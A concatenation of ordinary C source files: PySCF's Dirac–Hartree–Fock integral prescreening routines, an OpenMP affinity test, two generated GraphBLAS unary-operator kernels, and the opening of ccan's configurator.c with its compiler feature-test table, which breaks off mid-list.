GB_ATOMIC_COMPARE_EXCHANGE_X (target, expected, desired)
#endif
#endif
|
rkb_screen.c | /* Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*
* Author: Qiming Sun <osirpt.sun@gmail.com>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>
#include <complex.h>
#include <assert.h>
#include "cint.h"
#include "cvhf.h"
#include "optimizer.h"
#define MAX(I,J) ((I) > (J) ? (I) : (J))
#define LL 0
#define SS 1
#define SL 2
#define LS 3
int int2e_spinor();
int int2e_spsp1spsp2_spinor();
int GTOmax_cache_size(int (*intor)(), int *shls_slice, int ncenter,
int *atm, int natm, int *bas, int nbas, double *env);
int CVHFrkbllll_prescreen(int *shls, CVHFOpt *opt,
int *atm, int *bas, double *env)
{
if (!opt) {
return 1; // no screen
}
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int n = opt->nbas;
assert(opt->q_cond);
assert(opt->dm_cond);
assert(i < n);
assert(j < n);
assert(k < n);
assert(l < n);
double qijkl = opt->q_cond[i*n+j] * opt->q_cond[k*n+l];
double dmin = opt->direct_scf_cutoff / qijkl;
return qijkl > opt->direct_scf_cutoff
&&((opt->dm_cond[j*n+i] > dmin)
|| (opt->dm_cond[l*n+k] > dmin)
|| (opt->dm_cond[j*n+k] > dmin)
|| (opt->dm_cond[j*n+l] > dmin)
|| (opt->dm_cond[i*n+k] > dmin)
|| (opt->dm_cond[i*n+l] > dmin));
}
int CVHFrkbllll_vkscreen(int *shls, CVHFOpt *opt,
double **dms_cond, int n_dm, double *dm_atleast,
int *atm, int *bas, double *env)
{
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int nbas = opt->nbas;
int idm;
double qijkl = opt->q_cond[i*nbas+j] * opt->q_cond[k*nbas+l];
double *pdmscond = opt->dm_cond + nbas*nbas;
for (idm = 0; idm < (n_dm+1)/2; idm++) {
// note in _vhf.rdirect_mapdm, J and K share the same DM
dms_cond[idm*2+0] = pdmscond + idm*nbas*nbas; // for vj
dms_cond[idm*2+1] = pdmscond + idm*nbas*nbas; // for vk
}
*dm_atleast = opt->direct_scf_cutoff / qijkl;
return 1;
}
int CVHFrkbssll_prescreen(int *shls, CVHFOpt *opt,
int *atm, int *bas, double *env)
{
if (!opt) {
return 1; // no screen
}
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int n = opt->nbas;
assert(opt->q_cond);
assert(opt->dm_cond);
assert(i < n);
assert(j < n);
assert(k < n);
assert(l < n);
double *dmsl = opt->dm_cond + n*n*SL;
double qijkl = opt->q_cond[n*n*SS+i*n+j] * opt->q_cond[k*n+l];
double dmin = opt->direct_scf_cutoff / qijkl;
return qijkl > opt->direct_scf_cutoff
&&((opt->dm_cond[n*n*SS+j*n+i] > dmin)
|| (opt->dm_cond[l*n+k] > dmin)
|| (dmsl[j*n+k] > dmin)
|| (dmsl[j*n+l] > dmin)
|| (dmsl[i*n+k] > dmin)
|| (dmsl[i*n+l] > dmin));
}
// be careful with the order in dms_cond, the current order (dmll, dmss, dmsl)
// is consistent to the function _call_veff_ssll in dhf.py
int CVHFrkbssll_vkscreen(int *shls, CVHFOpt *opt,
double **dms_cond, int n_dm, double *dm_atleast,
int *atm, int *bas, double *env)
{
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int nbas = opt->nbas;
int idm;
double qijkl = opt->q_cond[nbas*nbas*SS+i*nbas+j] * opt->q_cond[k*nbas+l];
double *pdmscond = opt->dm_cond + 4*nbas*nbas;
int nset = (n_dm+2) / 3;
double *dmscondll = pdmscond + nset*nbas*nbas*LL;
double *dmscondss = pdmscond + nset*nbas*nbas*SS;
double *dmscondsl = pdmscond + nset*nbas*nbas*SL;
for (idm = 0; idm < nset; idm++) {
dms_cond[nset*0+idm] = dmscondll + idm*nbas*nbas;
dms_cond[nset*1+idm] = dmscondss + idm*nbas*nbas;
dms_cond[nset*2+idm] = dmscondsl + idm*nbas*nbas;
}
*dm_atleast = opt->direct_scf_cutoff / qijkl;
return 1;
}
static void set_qcond(int (*intor)(), CINTOpt *cintopt, double *qcond,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
int shls_slice[] = {0, nbas};
const int cache_size = GTOmax_cache_size(intor, shls_slice, 1,
atm, natm, bas, nbas, env);
#pragma omp parallel
{
double qtmp, tmp;
int i, j, ij, di, dj, ish, jsh;
int shls[4];
double *cache = malloc(sizeof(double) * cache_size);
di = 0;
for (ish = 0; ish < nbas; ish++) {
dj = ao_loc[ish+1] - ao_loc[ish];
di = MAX(di, dj);
}
double complex *buf = malloc(sizeof(double complex) * di*di*di*di);
#pragma omp for schedule(dynamic, 4)
for (ij = 0; ij < nbas*(nbas+1)/2; ij++) {
ish = (int)(sqrt(2*ij+.25) - .5 + 1e-7);
jsh = ij - ish*(ish+1)/2;
di = ao_loc[ish+1] - ao_loc[ish];
dj = ao_loc[jsh+1] - ao_loc[jsh];
shls[0] = ish;
shls[1] = jsh;
shls[2] = ish;
shls[3] = jsh;
qtmp = 1e-100;
if (0 != (*intor)(buf, NULL, shls, atm, natm, bas, nbas, env, cintopt, cache)) {
for (i = 0; i < di; i++) {
for (j = 0; j < dj; j++) {
tmp = cabs(buf[i+di*j+di*dj*i+di*dj*di*j]);
qtmp = MAX(qtmp, tmp);
} }
qtmp = sqrt(qtmp);
}
qcond[ish*nbas+jsh] = qtmp;
qcond[jsh*nbas+ish] = qtmp;
}
free(buf);
free(cache);
}
}
void CVHFrkbllll_direct_scf(CVHFOpt *opt, int (*intor)(), CINTOpt *cintopt,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->q_cond) {
free(opt->q_cond);
}
opt->q_cond = (double *)malloc(sizeof(double) * nbas*nbas);
assert(intor == &int2e_spinor);
set_qcond(intor, cintopt, opt->q_cond, ao_loc, atm, natm, bas, nbas, env);
}
void CVHFrkbssss_direct_scf(CVHFOpt *opt, int (*intor)(), CINTOpt *cintopt,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->q_cond) {
free(opt->q_cond);
}
opt->q_cond = (double *)malloc(sizeof(double) * nbas*nbas);
assert(intor == &int2e_spsp1spsp2_spinor);
set_qcond(intor, cintopt, opt->q_cond, ao_loc, atm, natm, bas, nbas, env);
double c1 = .25/(env[PTR_LIGHT_SPEED]*env[PTR_LIGHT_SPEED]);
double *qcond = opt->q_cond;
int i;
for (i = 0; i < nbas*nbas; i++) {
qcond[i] *= c1;
}
}
void CVHFrkbssll_direct_scf(CVHFOpt *opt, int (*intor)(), CINTOpt *cintopt,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->q_cond) {
free(opt->q_cond);
}
opt->q_cond = (double *)malloc(sizeof(double) * nbas*nbas*2);
set_qcond(&int2e_spinor, NULL, opt->q_cond, ao_loc, atm, natm, bas, nbas, env);
set_qcond(&int2e_spsp1spsp2_spinor, NULL, opt->q_cond+nbas*nbas, ao_loc,
atm, natm, bas, nbas, env);
double c1 = .25/(env[PTR_LIGHT_SPEED]*env[PTR_LIGHT_SPEED]);
double *qcond = opt->q_cond + nbas*nbas;
int i;
for (i = 0; i < nbas*nbas; i++) {
qcond[i] *= c1;
}
}
static void set_dmcond(double *dmcond, double *dmscond, double complex *dm,
double direct_scf_cutoff, int nset, int *ao_loc,
int *atm, int natm, int *bas, int nbas, double *env)
{
const size_t nao = ao_loc[nbas];
double dmax, dmaxi, tmp;
int i, j, ish, jsh;
int iset;
double complex *pdm;
for (ish = 0; ish < nbas; ish++) {
for (jsh = 0; jsh <= ish; jsh++) {
dmax = 0;
for (iset = 0; iset < nset; iset++) {
dmaxi = 0;
pdm = dm + nao*nao*iset;
for (i = ao_loc[ish]; i < ao_loc[ish+1]; i++) {
for (j = ao_loc[jsh]; j < ao_loc[jsh+1]; j++) {
tmp = .5 * (cabs(pdm[i*nao+j]) + cabs(pdm[j*nao+i]));
dmaxi = MAX(dmaxi, tmp);
} }
dmscond[iset*nbas*nbas+ish*nbas+jsh] = dmaxi;
dmscond[iset*nbas*nbas+jsh*nbas+ish] = dmaxi;
dmax = MAX(dmax, dmaxi);
}
dmcond[ish*nbas+jsh] = dmax;
dmcond[jsh*nbas+ish] = dmax;
} }
}
// dm_cond ~ 1+nset, dm_cond + dms_cond
void CVHFrkbllll_direct_scf_dm(CVHFOpt *opt, double complex *dm, int nset,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->dm_cond) { // NOT reuse opt->dm_cond because nset may be diff in different call
free(opt->dm_cond);
}
opt->dm_cond = (double *)malloc(sizeof(double)*nbas*nbas*(1+nset));
memset(opt->dm_cond, 0, sizeof(double)*nbas*nbas*(1+nset));
// dmcond followed by dmscond which are max matrix element for each dm
set_dmcond(opt->dm_cond, opt->dm_cond+nbas*nbas, dm,
opt->direct_scf_cutoff, nset, ao_loc, atm, natm, bas, nbas, env);
}
void CVHFrkbssss_direct_scf_dm(CVHFOpt *opt, double complex *dm, int nset,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->dm_cond) {
free(opt->dm_cond);
}
opt->dm_cond = (double *)malloc(sizeof(double)*nbas*nbas*(1+nset));
memset(opt->dm_cond, 0, sizeof(double)*nbas*nbas*(1+nset));
set_dmcond(opt->dm_cond, opt->dm_cond+nbas*nbas, dm,
opt->direct_scf_cutoff, nset, ao_loc, atm, natm, bas, nbas, env);
}
// the current order of dmscond (dmll, dmss, dmsl) is consistent to the
// function _call_veff_ssll in dhf.py
void CVHFrkbssll_direct_scf_dm(CVHFOpt *opt, double complex *dm, int nset,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->dm_cond) {
free(opt->dm_cond);
}
if (nset < 3) {
fprintf(stderr, "At least 3 sets of DMs (dmll,dmss,dmsl) are "
"required to set rkb prescreening\n");
exit(1);
}
nset = nset / 3;
opt->dm_cond = (double *)malloc(sizeof(double)*nbas*nbas*4*(1+nset));
memset(opt->dm_cond, 0, sizeof(double)*nbas*nbas*4*(1+nset));
// 4 types of dmcond (LL,SS,SL,SS) followed by 4 types of dmscond
int n2c = CINTtot_cgto_spinor(bas, nbas);
double *dmcondll = opt->dm_cond + nbas*nbas*LL;
double *dmcondss = opt->dm_cond + nbas*nbas*SS;
double *dmcondsl = opt->dm_cond + nbas*nbas*SL;
//double *dmcondls = opt->dm_cond + nbas*nbas*LS;
double *pdmscond = opt->dm_cond + nbas*nbas*4;
double *dmscondll = pdmscond + nset*nbas*nbas*LL;
double *dmscondss = pdmscond + nset*nbas*nbas*SS;
double *dmscondsl = pdmscond + nset*nbas*nbas*SL;
//double *dmscondls = dmscond + nset*nbas*nbas*LS;
double complex *dmll = dm + n2c*n2c*LL*nset;
double complex *dmss = dm + n2c*n2c*SS*nset;
double complex *dmsl = dm + n2c*n2c*SL*nset;
//double complex *dmls = dm + n2c*n2c*LS*nset;
set_dmcond(dmcondll, dmscondll, dmll,
opt->direct_scf_cutoff, nset, ao_loc, atm, natm, bas, nbas, env);
set_dmcond(dmcondss, dmscondss, dmss,
opt->direct_scf_cutoff, nset, ao_loc, atm, natm, bas, nbas, env);
set_dmcond(dmcondsl, dmscondsl, dmsl,
opt->direct_scf_cutoff, nset, ao_loc, atm, natm, bas, nbas, env);
}
|
simple_env.c | // RUN: %libomp-compile
// RUN: env OMP_DISPLAY_AFFINITY=true OMP_AFFINITY_FORMAT='TESTER-ENV: tl:%L tn:%n nt:%N' OMP_NUM_THREADS=8 %libomp-run | %python %S/check.py -c 'CHECK-8' %s
#include <stdio.h>
#include <stdlib.h>
#include <omp.h>
int main(int argc, char** argv) {
#pragma omp parallel
{ }
#pragma omp parallel
{ }
return 0;
}
// CHECK-8: num_threads=8 TESTER-ENV: tl:1 tn:[0-7] nt:8$
|
GB_unaryop__abs_fp64_uint32.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2020, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__abs_fp64_uint32
// op(A') function: GB_tran__abs_fp64_uint32
// C type: double
// A type: uint32_t
// cast: double cij = (double) aij
// unaryop: cij = fabs (aij)
#define GB_ATYPE \
uint32_t
#define GB_CTYPE \
double
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
uint32_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = fabs (x) ;
// casting
#define GB_CASTING(z, aij) \
double z = (double) aij ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (z, aij) ; \
GB_OP (GB_CX (pC), z) ; \
}
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_ABS || GxB_NO_FP64 || GxB_NO_UINT32)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__abs_fp64_uint32
(
double *Cx, // Cx and Ax may be aliased
uint32_t *Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__abs_fp64_uint32
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *GB_RESTRICT *Rowcounts,
GBI_single_iterator Iter,
const int64_t *GB_RESTRICT A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
GB_unop__ainv_uint64_uint64.c | //------------------------------------------------------------------------------
// GB_unop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2020, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_unop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop_apply__ainv_uint64_uint64
// op(A') function: GB_unop_tran__ainv_uint64_uint64
// C type: uint64_t
// A type: uint64_t
// cast: uint64_t cij = aij
// unaryop: cij = -aij
#define GB_ATYPE \
uint64_t
#define GB_CTYPE \
uint64_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
uint64_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = -x ;
// casting
#define GB_CAST(z, aij) \
uint64_t z = aij ;
// cij = op (aij)
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
uint64_t aij = Ax [pA] ; \
/* Cx [pC] = op (cast (aij)) */ \
uint64_t z = aij ; \
Cx [pC] = -z ; \
}
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_AINV || GxB_NO_UINT64)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop_apply__ainv_uint64_uint64
(
uint64_t *Cx, // Cx and Ax may be aliased
const uint64_t *Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
uint64_t aij = Ax [p] ;
uint64_t z = aij ;
Cx [p] = -z ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop_tran__ainv_uint64_uint64
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *GB_RESTRICT *Rowcounts,
GBI_single_iterator Iter,
const int64_t *GB_RESTRICT A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
configurator.c | /* Simple tool to create config.h.
* Would be much easier with ccan modules, but deliberately standalone.
*
* Copyright 2011 Rusty Russell <rusty@rustcorp.com.au>. MIT license.
*
* c12r_err, c12r_errx functions copied from ccan/err/err.c
* Copyright Rusty Russell <rusty@rustcorp.com.au>. CC0 (Public domain) License.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#define _POSIX_C_SOURCE 200809L /* For pclose, popen, strdup */
#define EXIT_BAD_USAGE 1
#define EXIT_TROUBLE_RUNNING 2
#define EXIT_BAD_TEST 3
#define EXIT_BAD_INPUT 4
#include <errno.h>
#include <stdio.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#ifdef _MSC_VER
#define popen _popen
#define pclose _pclose
#endif
#ifdef _MSC_VER
#define DEFAULT_COMPILER "cl"
/* Note: Dash options avoid POSIX path conversion when used under msys bash
* and are therefore preferred to slash (e.g. -nologo over /nologo)
* Note: Disable Warning 4200 "nonstandard extension used : zero-sized array
* in struct/union" for flexible array members.
*/
#define DEFAULT_FLAGS "-nologo -Zi -W4 -wd4200 " \
"-D_CRT_NONSTDC_NO_WARNINGS -D_CRT_SECURE_NO_WARNINGS"
#define DEFAULT_OUTPUT_EXE_FLAG "-Fe:"
#else
#define DEFAULT_COMPILER "cc"
#define DEFAULT_FLAGS "-g3 -ggdb -Wall -Wundef -Wmissing-prototypes -Wmissing-declarations -Wstrict-prototypes -Wold-style-definition"
#define DEFAULT_OUTPUT_EXE_FLAG "-o"
#endif
#define OUTPUT_FILE "configurator.out"
#define INPUT_FILE "configuratortest.c"
#ifdef _WIN32
#define DIR_SEP "\\"
#else
#define DIR_SEP "/"
#endif
static const char *progname = "";
static int verbose;
static bool like_a_libtool = false;
struct test {
const char *name;
const char *desc;
/*
* Template style flags (pick one):
* OUTSIDE_MAIN:
* - put a simple boilerplate main below it.
* DEFINES_FUNC:
* - defines a static function called func; adds ref to avoid warnings
* INSIDE_MAIN:
* - put this inside main().
* DEFINES_EVERYTHING:
* - don't add any boilerplate at all.
*
* Execution flags:
* EXECUTE:
* - a runtime test; must compile, exit 0 means flag is set.
* MAY_NOT_COMPILE:
* - Only useful with EXECUTE: don't get upset if it doesn't compile.
* <nothing>:
* - a compile test, if it compiles must run and exit 0.
*/
const char *style;
const char *depends;
const char *link;
const char *fragment;
const char *flags;
const char *overrides; /* On success, force this to '1' */
bool done;
bool answer;
};
/* Terminated by a NULL name */
static struct test *tests;
static const struct test base_tests[] = {
{ "HAVE_32BIT_OFF_T", "off_t is 32 bits",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE", NULL, NULL,
"#include <sys/types.h>\n"
"int main(void) {\n"
" return sizeof(off_t) == 4 ? 0 : 1;\n"
"}\n" },
{ "HAVE_ALIGNOF", "__alignof__ support",
"INSIDE_MAIN", NULL, NULL,
"return __alignof__(double) > 0 ? 0 : 1;" },
{ "HAVE_ASPRINTF", "asprintf() declaration",
"DEFINES_FUNC", NULL, NULL,
"#ifndef _GNU_SOURCE\n"
"#define _GNU_SOURCE\n"
"#endif\n"
"#include <stdio.h>\n"
"static char *func(int x) {"
" char *p;\n"
" if (asprintf(&p, \"%u\", x) == -1) \n"
" p = NULL;\n"
" return p;\n"
"}" },
{ "HAVE_ATTRIBUTE_COLD", "__attribute__((cold)) support",
"DEFINES_FUNC", NULL, NULL,
"static int __attribute__((cold)) func(int x) { return x; }" },
{ "HAVE_ATTRIBUTE_CONST", "__attribute__((const)) support",
"DEFINES_FUNC", NULL, NULL,
"static int __attribute__((const)) func(int x) { return x; }" },
{ "HAVE_ATTRIBUTE_DEPRECATED", "__attribute__((deprecated)) support",
"DEFINES_FUNC", NULL, NULL,
"static int __attribute__((deprecated)) func(int x) { return x; }" },
{ "HAVE_ATTRIBUTE_NONNULL", "__attribute__((nonnull)) support",
"DEFINES_FUNC", NULL, NULL,
"static char *__attribute__((nonnull)) func(char *p) { return p; }" },
{ "HAVE_ATTRIBUTE_SENTINEL", "__attribute__((sentinel)) support",
"DEFINES_FUNC", NULL, NULL,
"static int __attribute__((sentinel)) func(int i, ...) { return i; }" },
{ "HAVE_ATTRIBUTE_PURE", "__attribute__((pure)) support",
"DEFINES_FUNC", NULL, NULL,
"static int __attribute__((pure)) func(int x) { return x; }" },
{ "HAVE_ATTRIBUTE_MAY_ALIAS", "__attribute__((may_alias)) support",
"OUTSIDE_MAIN", NULL, NULL,
"typedef short __attribute__((__may_alias__)) short_a;" },
{ "HAVE_ATTRIBUTE_NORETURN", "__attribute__((noreturn)) support",
"DEFINES_FUNC", NULL, NULL,
"#include <stdlib.h>\n"
"static void __attribute__((noreturn)) func(int x) { exit(x); }" },
{ "HAVE_ATTRIBUTE_PRINTF", "__attribute__ format printf support",
"DEFINES_FUNC", NULL, NULL,
"static void __attribute__((format(__printf__, 1, 2))) func(const char *fmt, ...) { (void)fmt; }" },
{ "HAVE_ATTRIBUTE_UNUSED", "__attribute__((unused)) support",
"OUTSIDE_MAIN", NULL, NULL,
"static int __attribute__((unused)) func(int x) { return x; }" },
{ "HAVE_ATTRIBUTE_USED", "__attribute__((used)) support",
"OUTSIDE_MAIN", NULL, NULL,
"static int __attribute__((used)) func(int x) { return x; }" },
{ "HAVE_BACKTRACE", "backtrace() in <execinfo.h>",
"DEFINES_FUNC", NULL, NULL,
"#include <execinfo.h>\n"
"static int func(int x) {"
" void *bt[10];\n"
" return backtrace(bt, 10) < x;\n"
"}" },
{ "HAVE_BIG_ENDIAN", "big endian",
"INSIDE_MAIN|EXECUTE", NULL, NULL,
"union { int i; char c[sizeof(int)]; } u;\n"
"u.i = 0x01020304;\n"
"return u.c[0] == 0x01 && u.c[1] == 0x02 && u.c[2] == 0x03 && u.c[3] == 0x04 ? 0 : 1;" },
{ "HAVE_BSWAP_64", "bswap64 in byteswap.h",
"DEFINES_FUNC", "HAVE_BYTESWAP_H", NULL,
"#include <byteswap.h>\n"
"static int func(int x) { return bswap_64(x); }" },
{ "HAVE_BUILTIN_CHOOSE_EXPR", "__builtin_choose_expr support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_choose_expr(1, 0, \"garbage\");" },
{ "HAVE_BUILTIN_CLZ", "__builtin_clz support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_clz(1) == (sizeof(int)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CLZL", "__builtin_clzl support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_clzl(1) == (sizeof(long)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CLZLL", "__builtin_clzll support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_clzll(1) == (sizeof(long long)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CTZ", "__builtin_ctz support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ctz(1 << (sizeof(int)*8 - 1)) == (sizeof(int)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CTZL", "__builtin_ctzl support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ctzl(1UL << (sizeof(long)*8 - 1)) == (sizeof(long)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CTZLL", "__builtin_ctzll support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ctzll(1ULL << (sizeof(long long)*8 - 1)) == (sizeof(long long)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CONSTANT_P", "__builtin_constant_p support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_constant_p(1) ? 0 : 1;" },
{ "HAVE_BUILTIN_EXPECT", "__builtin_expect support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_expect(argc == 1, 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_FFS", "__builtin_ffs support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ffs(0) == 0 ? 0 : 1;" },
{ "HAVE_BUILTIN_FFSL", "__builtin_ffsl support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ffsl(0L) == 0 ? 0 : 1;" },
{ "HAVE_BUILTIN_FFSLL", "__builtin_ffsll support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ffsll(0LL) == 0 ? 0 : 1;" },
{ "HAVE_BUILTIN_POPCOUNT", "__builtin_popcount support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_popcount(255) == 8 ? 0 : 1;" },
{ "HAVE_BUILTIN_POPCOUNTL", "__builtin_popcountl support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_popcountl(255L) == 8 ? 0 : 1;" },
{ "HAVE_BUILTIN_POPCOUNTLL", "__builtin_popcountll support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_popcountll(255LL) == 8 ? 0 : 1;" },
{ "HAVE_BUILTIN_TYPES_COMPATIBLE_P", "__builtin_types_compatible_p support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_types_compatible_p(char *, int) ? 1 : 0;" },
{ "HAVE_ICCARM_INTRINSICS", "<intrinsics.h>",
"DEFINES_FUNC", NULL, NULL,
"#include <intrinsics.h>\n"
"int func(int v) {\n"
" return __CLZ(__RBIT(v));\n"
"}" },
{ "HAVE_BYTESWAP_H", "<byteswap.h>",
"OUTSIDE_MAIN", NULL, NULL,
"#include <byteswap.h>\n" },
{ "HAVE_CLOCK_GETTIME", "clock_gettime() declaration",
"DEFINES_FUNC", "HAVE_STRUCT_TIMESPEC", NULL,
"#include <time.h>\n"
"static struct timespec func(void) {\n"
" struct timespec ts;\n"
" clock_gettime(CLOCK_REALTIME, &ts);\n"
" return ts;\n"
"}\n" },
{ "HAVE_CLOCK_GETTIME_IN_LIBRT", "clock_gettime() in librt",
"DEFINES_FUNC",
"HAVE_STRUCT_TIMESPEC !HAVE_CLOCK_GETTIME",
"-lrt",
"#include <time.h>\n"
"static struct timespec func(void) {\n"
" struct timespec ts;\n"
" clock_gettime(CLOCK_REALTIME, &ts);\n"
" return ts;\n"
"}\n",
/* This means HAVE_CLOCK_GETTIME, too */
"HAVE_CLOCK_GETTIME" },
{ "HAVE_COMPOUND_LITERALS", "compound literal support",
"INSIDE_MAIN", NULL, NULL,
"int *foo = (int[]) { 1, 2, 3, 4 };\n"
"return foo[0] ? 0 : 1;" },
{ "HAVE_FCHDIR", "fchdir support",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE", NULL, NULL,
"#include <sys/types.h>\n"
"#include <sys/stat.h>\n"
"#include <fcntl.h>\n"
"#include <unistd.h>\n"
"int main(void) {\n"
" int fd = open(\"..\", O_RDONLY);\n"
" return fchdir(fd) == 0 ? 0 : 1;\n"
"}\n" },
{ "HAVE_ERR_H", "<err.h>",
"DEFINES_FUNC", NULL, NULL,
"#include <err.h>\n"
"static void func(int arg) {\n"
" if (arg == 0)\n"
" err(1, \"err %u\", arg);\n"
" if (arg == 1)\n"
" errx(1, \"err %u\", arg);\n"
" if (arg == 3)\n"
" warn(\"warn %u\", arg);\n"
" if (arg == 4)\n"
" warnx(\"warn %u\", arg);\n"
"}\n" },
{ "HAVE_FILE_OFFSET_BITS", "_FILE_OFFSET_BITS to get 64-bit offsets",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE",
"HAVE_32BIT_OFF_T", NULL,
"#define _FILE_OFFSET_BITS 64\n"
"#include <sys/types.h>\n"
"int main(void) {\n"
" return sizeof(off_t) == 8 ? 0 : 1;\n"
"}\n" },
{ "HAVE_FOR_LOOP_DECLARATION", "for loop declaration support",
